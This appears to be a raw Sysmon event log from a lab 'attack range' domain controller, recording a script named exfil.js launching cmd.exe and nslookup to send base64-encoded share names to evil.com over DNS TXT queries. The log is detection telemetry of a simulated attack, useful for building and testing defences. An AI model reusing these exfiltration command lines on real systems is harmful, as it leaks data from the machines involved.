14:16:13.217{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcaxap.tmpMD5=D1A54A6F21A90F6B3FDD9CFE56E9C930,SHA256=5C5F1828A4B86FD4EE344674F6FC0762ED42C1A295A6FDEB230A8253C2750995,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.165{2E1864BB-17AD-629A-793E-000000005F02}45804908C:\Windows\system32\conhost.exe{2E1864BB-17AD-629A-7A3E-000000005F02}7252C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.165{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.165{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.165{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.165{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.165{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AD-629A-7A3E-000000005F02}7252C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x8000000000000000195876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.165{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D581EFBED17998784F50B0BE947DC3C,SHA256=596E4D0479FEDAAB449F64AC45473E99900AF0B7FE3910B60DED9567E859A58B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.165{2E1864BB-17AD-629A-783E-000000005F02}6108708C:\Windows\system32\cmd.exe{2E1864BB-17AD-629A-7A3E-000000005F02}7252C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.168{2E1864BB-17AD-629A-7A3E-000000005F02}7252C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AD-629A-783E-000000005F02}6108C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcaxap.tmp 2>&1 10341000x8000000000000000195873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.117{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AD-629A-793E-000000005F02}4580C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.117{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AD-629A-793E-000000005F02}4580C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.117{2E1864BB-17AD-629A-793E-000000005F02}45804908C:\Windows\system32\conhost.exe{2E1864BB-17AD-629A-783E-000000005F02}6108C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.096{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AD-629A-793E-000000005F02}4580C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.096{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.096{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.096{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.096{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.096{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AD-629A-783E-000000005F02}6108C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.096{2E1864BB-17A1-629A-783D-000000005F02}55523712C:\Windows\System32\WScript.exe{2E1864BB-17AD-629A-783E-000000005F02}6108C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.098{2E1864BB-17AD-629A-783E-000000005F02}6108C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcaxap.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.080{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllmdir.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.033{2E1864BB-17AC-629A-763E-000000005F02}57446224C:\Windows\system32\conhost.exe{2E1864BB-17AD-629A-773E-000000005F02}6520C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.017{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AD-629A-773E-000000005F02}6520C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.017{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.017{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.017{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.017{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.017{2E1864BB-17AC-629A-753E-000000005F02}57483308C:\Windows\system32\cmd.exe{2E1864BB-17AD-629A-773E-000000005F02}6520C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.023{2E1864BB-17AD-629A-773E-000000005F02}6520C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AC-629A-753E-000000005F02}5748C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllmdir.tmp 2>&1 10341000x8000000000000000196207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.969{2E1864BB-17AE-629A-A03E-000000005F02}21323236C:\Windows\system32\conhost.exe{2E1864BB-17AE-629A-A13E-000000005F02}3396C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.969{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 